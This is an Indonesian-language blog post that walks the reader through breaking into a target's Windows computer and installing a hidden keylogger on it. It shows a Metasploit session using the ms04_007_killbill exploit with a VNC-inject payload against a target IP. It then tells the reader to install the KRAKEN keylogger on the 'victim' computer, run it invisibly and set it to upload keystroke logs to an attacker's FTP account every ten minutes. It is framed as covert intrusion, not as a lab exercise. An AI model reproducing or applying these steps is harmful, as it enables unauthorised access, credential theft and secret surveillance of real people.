Pertama-tama pastikan tidak ada orang yang menggunakan komputer target, setelah memastikan tidak ada, maka anda dapat masuk ke komputer target, contohnya diasumsikan komputer target mempunyai celah keamanan yang dapat di exploitasi dengan exploit killbill seperti dibawah ini dengan payload windows/vncinject/bind_tcp.
_ _
/ \ / \ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | | | | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | |_ \__/ | | | |_
|/ |____/ \___\/ /\ \___/ \/ \__| |_\ \___\
=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ — –=[ 716 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13462 updated 264 days ago (2011.08.01)
Warning: This copy of the Metasploit Framework was last updated 264 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf exploit(ms04_007_killbill) > use exploit/windows/smb/ms04_007_killbill
msf exploit(ms04_007_killbill) > set PAYLOAD windows/vncinject/bind_tcp
PAYLOAD => windows/vncinject/bind_tcp
msf exploit(ms04_007_killbill) > set RHOST 192.168.1.34
RHOST => 192.168.1.34
msf exploit(ms04_007_killbill) > exploit
[*] Started bind handler
[-] Error: The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0)
[*] Sending stage (445440 bytes) to 192.168.1.34
[*] Starting local TCP relay on 127.0.0.1:5900…
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 1 created in the background.
Setelah masuk ke remote desktop via VNC anda dapat mendownload Keylogger KRAKEN disini melalui browser pada komputer target, jika komputer target tidak terkoneksi internet, maka anda dapat mengirimkan via jaringan.
Jika program membutuhkan MSCOMCTL.OCX maka anda dapat mendownloadnya di http://www.ocxdump.com/download-ocx-files_new.php/ocxfiles/M/MSCOMCTL.OCX/6.01.9782/download.html.
Saat KRAKEN berhasil dijalankan, tampilannya seperti berikut :
Tutorial Penggunaanya:
Kraken – XCode Yogyafree FTP Keylogge
Download Kraken FTP Keylogger
Kraken – XCode Yogyafree FTP Keylogger, adalah sebuah Keylogger buatan Yogyafree yang memungkinkan anda untuk memantau hentakan keyboard melalui protokol FTP.
1. Menyiapkan Hosting FTP
sebagai medianya yang tentu sudah disebutkan diatas, anda perlu hosting FTP. Anda bisa gunakan jasa hosting gratis seperti driveq (google : free ftp hosting). sebagai contohnya disini penulis menggunakan jasa hosting ftp gratis dari www.drivehq.com. silahkan daftar dan aktifkan account FTP anda.
2. Setting Kraken di Komputer korban
Klik Kraken.exe dan anda akan mendapatkan tampilan awal Kraken.
Isi alamat FTP, user dan password dengan account yang telah anda buat
contoh:
Ftp Address : ftp.drivehq.com
User : UserAnda
Password : PasswordAnda
Pastikan anda mengisinya secara benar karena kraken akan tidak terlihat di layar monitor setelah anda klik “Start”.
3. Unleash The Kraken
Klik “Start” dan kraken akan bekerja dibalik layar komputer
Kraken akan merekam hentakan keyboard dan menyimpannya dengan nama file
filerekam-NAMAKOMP-TanggalRekaman.txt.
Setiap 10 menit, kraken akan mengirimkan log file ke hosting ftp anda
Hasil rekaman keyboard dapat anda pantau melalui website.
4. Merubah tujuan kiriman FTP
Jika anda ingin mengubah tujuan kiriman log file, Anda bisa ke C:\WINDOWS\ dan cari file
C:\windows\ftp.txt untuk mengubah alamat ftp
C:\windows\userftp.txt untuk mengubah username
C:\windows\ftppass.txt untuk mengubah password
0 comments
Post a Comment